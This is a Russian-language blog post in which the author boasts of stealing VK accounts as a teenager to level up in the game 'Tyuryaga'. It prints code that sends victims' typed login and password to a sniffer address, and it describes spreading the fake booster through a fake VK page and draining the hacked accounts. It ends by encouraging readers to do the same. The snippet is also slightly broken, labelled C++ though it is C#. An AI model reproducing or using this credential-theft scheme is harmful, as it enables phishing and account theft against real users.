Как я стал одним из сильных бойцов «Тюряги» в ВК

Заядлых хабравчан прошу не писать, что такую программку может сделать любой, мне на тот момент было 13 лет.

Всё началось с того, что я долго и усердно играл в пресловутую «Тюрягу». Мне, как и многим другим «игрокам», хотелось быстро разбогатеть в игре. Но легальных способов найти я увы не смог. Поэтому прибег к нелегальному, хоть и очень простому, но всё же опишу его.

Итак, я решил сделать программку для кражи почты и паролей для ВК или же id и auth key (специальный ключ, генерирующийся по паролю и почте для каждого приложения). Я приступил к работе. Решено писать было на C++. Схема кражи была обычна: приложение для накрутки внутренней валюты игры, которое при вводе почты и пароля отправляет её на сниффер, код для этого такой:

Код:
<code class="cpp"> string adres;
            adres = "сниффер" + "|login:" + textBox1.Text + " pass:" + textBox2.Text + "|";
            webBrowser1.Navigate(adres);
</code>

Естественно после первой пробы отправки мне пришло беспорядочно написанный набор символов, т.к. код изначально принимал вид:

Код:
<code class="cpp">string adres;
            adres = "сниффер" + textBox1.Text + textBox2.Text;
            webBrowser1.Navigate(adres);
</code>

То есть приходило в таком виде: ящик@почта.ру123456. Естественно мне это не понравилось, и я изменил вид к нормальному.
В итоге получился такой вид программы:

Социальные сети: Как я стал одним из сильных бойцов «Тюряги» в ВК

Далее я выбирал способ распространения и остановился на фейковой странице ВК. Написал в заметках как использовать программу, добавлял каждый день по 40 разрешённых друзей (естественно из группы игры «Тюряга») около недели и в итоге мне стало приходить на сниффер ежедневно около 3-4 паролей (всего сообщений было около 12-15, но в них не было ничего интересного). Потом я скачал, думаю, с небезизвестного сайта vilkaa программу для перевода «нычек» со взломанных аккаунтов. И так за неделю я поднялся примерно на 30 уровней. Я так думаю, этот способ и по сей день работает на многих приложениях в ВК. Так что дерзайте.


0 комментариев

Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.